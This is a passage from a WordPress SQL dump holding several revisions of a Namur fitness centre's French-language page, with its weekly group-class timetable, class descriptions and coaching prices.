class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-01-18 19:07:15', '2014-01-18 19:07:15', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(417, 1, '2014-01-18 19:08:19', '2014-01-18 19:08:19', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-01-18 19:08:19', '2014-01-18 19:08:19', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(416, 1, '2014-01-18 19:07:48', '2014-01-18 19:07:48', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-01-18 19:07:48', '2014-01-18 19:07:48', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(418, 1, '2014-01-18 19:09:02', '2014-01-18 19:09:02', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-01-18 19:09:02', '2014-01-18 19:09:02', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(419, 1, '2014-01-18 19:11:50', '2014-01-18 19:11:50', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td 